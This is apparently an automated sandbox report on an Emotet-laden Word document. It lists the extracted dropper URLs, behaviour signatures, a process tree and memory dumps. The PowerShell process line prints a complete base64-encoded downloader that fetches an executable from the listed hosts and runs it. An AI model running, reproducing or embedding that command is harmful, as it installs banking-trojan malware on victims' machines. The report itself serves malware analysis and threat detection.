Overview

overview

10

task1

 

10

Analysis

  • max time kernel
    25s
  • max time network
    21s
  • resource
    win7v191014
  • submitted
    04-02-2020 20:58

Sharing

Copy URL
Twitter E-mail

General

  • Target

    ba1ad7a3f3d3f24d4862ca8b73df68f7e30f04153cc87040d51e2943af746c09.doc

  • Sample

    200204-nbm656ce3a

  • SHA256

    ba1ad7a3f3d3f24d4862ca8b73df68f7e30f04153cc87040d51e2943af746c09

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://www.trinomulkantho.com/fkejsh742jdhed/uvb/
exe.dropper

http://40ad.com/wp-admin/jktqs/
exe.dropper

http://bestdiyprojects.info/wp-admin/GI/
exe.dropper

https://zetalogs.com/wp-includes/UUO2l9rLzB/
exe.dropper

https://beleze.com.br/social/KHp2ow/

Signatures

  • Blacklisted process makes network request 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs
  • Suspicious use of WriteProcessMemory 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

    trojanbankeremotet

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ba1ad7a3f3d3f24d4862ca8b73df68f7e30f04153cc87040d51e2943af746c09.doc"
    1⤵
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2044
  • C:\Windows\System32\WindowsPowerShell\v1.0\PoWERsheLL.exe
    PoWERsheLL -e JABWAHgAbwB3AGwAdwBiAGoAPQAnAEUAegBmAG4AZABnAGoAeQB1AG4AJwA7ACQATwBzAGUAbQByAGEAaQB5ACAAPQAgACcAOAAyADQAJwA7ACQATQBkAG8AbABrAHoAaQBuAHAAagBxAD0AJwBTAG0AZgBvAHMAdgBiAGcAJwA7ACQATwBlAHEAcgB4AGcAaQByAGsAdQBmAHkAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAE8AcwBlAG0AcgBhAGkAeQArACcALgBlAHgAZQAnADsAJABOAHIAagBrAHEAagBkAGgAZgBtAGkAPQAnAFcAawBxAGsAbwB3AG8AcQBwAHEAYwBvACcAOwAkAFMAcABqAG4AZgBzAHkAZABlAGIAYwBjAD0ALgAoACcAbgAnACsAJwBlAHcALQBvAGIAagAnACsAJwBlAGMAJwArACcAdAAnACkAIABOAEUAVAAuAHcARQBiAGMATABpAGUATgBUADsAJABUAG0AegBiAGUAZgBzAGUAdwBmAGEAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgB0AHIAaQBuAG8AbQB1AGwAawBhAG4AdABoAG8ALgBjAG8AbQAvAGYAawBlAGoAcwBoADcANAAyAGoAZABoAGUAZAAvAHUAdgBiAC8AKgBoAHQAdABwADoALwAvADQAMABhAGQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGoAawB0AHEAcwAvACoAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AGQAaQB5AHAAcgBvAGoAZQBjAHQAcwAuAGkAbgBmAG8ALwB3AHAALQBhAGQAbQBpAG4ALwBHAEkALwAqAGgAdAB0AHAAcwA6AC8ALwB6AGUAdABhAGwAbwBnAHMALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFUAVQBPADIAbAA5AHIATAB6AEIALwAqAGgAdAB0AHAAcwA6AC8ALwBiAGUAbABlAHoAZQAuAGMAbwBtAC4AYgByAC8AcwBvAGMAaQBhAGwALwBLAEgAcAAyAG8AdwAvACcALgAiAFMAcABgAGwASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQARwB2AGEAaABpAHAAcABiAHQAYgBvAHIAPQAnAEIAawBqAHMAcQB0AGkAZABiAGsAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFAAZgBpAGEAaABmAG4AcgBoAHEAeAByACAAaQBuACAAJABUAG0AegBiAGUAZgBzAGUAdwBmAGEAKQB7AHQAcgB5AHsAJABTAHAAagBuAGYAcwB5AGQAZQBiAGMAYwAuACIAZABPAFcAYABOAEwATwBhAGAARABgAEYAaQBsAGUAIgAoACQAUABmAGkAYQBoAGYAbgByAGgAcQB4AHIALAAgACQATwBlAHEAcgB4AGcAaQByAGsAdQBmAHkAKQA7ACQASQB4AHgAYQBnAHcAdABxAHgAbQA9ACcAWgBtAGQAdgByAHAAdgB4AHMAJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABPAGUAcQByAHgAZwBpAHIAawB1AGYAeQApAC4AIgBsAEUAbgBHAGAAVABoACIAIAAtAGcAZQAgADIAMQA2ADgAMwApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBgAFIARQBgAEEAdABFACIAKAAkAE8AZQBxAHIAeABnAGkAcgBrAHUAZgB5ACkAOwAkAEgAawB4AGMAawBjAHQAcAB0AD0AJwBTAGUAdAB1AHMAeABuAG8AbwAnADsAYgByAGUAYQBrADsAJABTAGQAcQBuAG0AbQBwAHEAPQAnAEgAcwB0AHYAeQBxAGYAdgB0ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMAZwBrAHEAeQB1AGMAegBmAG4APQAnAEQAcwB0AGwAeABxAGcAYQBkAGYAegBrAGwAJwA=
    1⤵
    • Blacklisted process makes network request
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Drops file in System32 directory
    PID:784
  • C:\Users\Admin\824.exe
    C:\Users\Admin\824.exe
    1⤵
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    • Suspicious behavior: EmotetMutantsSpam
    • Drops file in System32 directory
    PID:1412
    • C:\Windows\SysWOW64\WMVSDECD\WMVSDECD.exe
      "C:\Windows\SysWOW64\WMVSDECD\WMVSDECD.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      PID:2004

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\824.exe
    Download Submit

  • C:\Users\Admin\824.exe
    Download Submit

  • C:\Windows\SysWOW64\WMVSDECD\WMVSDECD.exe
    Download Submit

  • memory/1412-9-0x0000000000340000-0x000000000034C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/1412-10-0x0000000000400000-0x0000000000466000-memory.dmp

    Filesize

    408KB

    Download

  • memory/2044-0-0x0000000000348000-0x0000000000350000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2044-2-0x0000000007B00000-0x0000000007B04000-memory.dmp

    Filesize

    16KB

    Download

  • memory/2044-3-0x0000000007250000-0x0000000007450000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/2044-4-0x0000000008C3A000-0x0000000008C3E000-memory.dmp

    Filesize

    16KB

    Download

  • memory/2044-5-0x0000000008C3E000-0x0000000008C42000-memory.dmp

    Filesize

    16KB

    Download

  • memory/2044-6-0x00000000022F0000-0x00000000022F4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/2044-7-0x0000000002370000-0x0000000002374000-memory.dmp

    Filesize

    16KB

    Download